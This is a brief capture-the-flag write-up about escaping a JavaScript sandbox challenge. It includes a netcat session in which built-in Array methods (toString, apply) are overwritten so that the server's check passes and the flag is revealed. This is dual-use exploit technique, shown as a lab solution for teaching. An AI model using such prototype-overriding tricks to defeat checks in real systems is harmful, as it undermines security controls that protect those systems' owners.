In this task we are asked to bypass a javascript jail. When we connect to the server we get this:

check = checker(FLAG, safeRand);
Usage: check(your random function);

After some fuzz we managed to take the check() source by calling the checker() function (you can find the source here: http://pastebin.com/RmyLgn01). For bypass this we just overwrite the Array.prototype.toString method with a custom function which returned a static content.Then we overwrite Array.apply with a function that return an empty array and then return another empty array from the main function:

[email protected]:/home/nms$ nc 54.178.218.50 6789
check = checker(FLAG, safeRand);
Usage: check(your random function);
  Array.prototype.toString = function() { return "1"; };
function () { return "foo"; }
  check(function(xyq) { Array.apply = function() { return Array(); }; return Array(); });
stage1
stage2
awesome!
The flag is 7bb1aad810f7db430bf4f62b997a992c

Razor4x